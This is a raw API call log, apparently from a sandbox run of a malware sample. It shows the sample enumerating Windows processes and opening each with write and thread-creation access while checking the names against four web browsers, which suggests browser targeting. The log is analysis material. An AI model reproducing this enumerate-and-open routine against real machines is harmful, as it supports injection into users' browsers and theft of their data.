	[0218.711] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0218.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4a98
	[0218.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.712] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0218.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.712] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.713] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0218.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.713] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0218.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4a9c
	[0218.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.714] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0218.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.714] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.715] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0218.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.715] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0218.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4aa0
	[0218.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.716] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0218.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.716] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.716] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0218.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.717] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0218.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4aa4
	[0218.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.718] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0218.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.718] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.718] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0218.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.719] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0218.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4aa8
	[0218.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.720] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0218.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.720] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.720] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0218.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.721] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0218.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4aac
	[0218.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.722] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0218.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.722] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.722] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0218.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.722] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.723] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0218.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4ab0
	[0218.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.723] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0218.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.724] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.724] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0218.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.724] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4ab4
	[0218.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.725] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.725] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.726] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.726] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4ab8
	[0218.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.727] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.727] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.728] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.728] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.728] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4abc
	[0218.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.729] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.729] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.730] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.730] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4ac0
	[0218.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.731] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.731] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.732] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.732] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.732] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4ac4
	[0218.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.733] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.733] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.734] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.734] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.734] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4ac8
	[0218.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.735] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.735] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.736] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.736] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4acc
	[0218.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.737] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.737] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.738] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.738] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.738] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0218.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4ad0
	[0218.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.739] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0218.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.739] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.739] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0218.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.740] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.740] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4ad4
	[0218.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.741] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.741] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.741] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.742] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.742] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0218.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4ad8
	[0218.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.743] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.743] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.743] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.744] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0218.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4adc
	[0218.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.745] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0218.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.746] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.746] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0218.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.746] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4ae0
	[0218.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.747] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.748] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.748] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.748] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0218.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4ae4
	[0218.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.749] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0218.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.750] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.750] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0218.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.750] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0218.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4ae8
	[0218.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.752] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0218.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.752] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.752] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0218.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.753] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.753] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0218.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4aec
	[0218.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.754] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0218.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.754] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.754] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0218.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.754] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.754] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0218.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4af0
	[0218.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.755] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0218.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.756] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.756] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0218.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.756] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.757] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0218.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0218.757] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0218.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4af4
	[0218.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.758] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0218.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.759] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.759] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0218.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.760] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.760] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0218.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4af8
	[0218.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
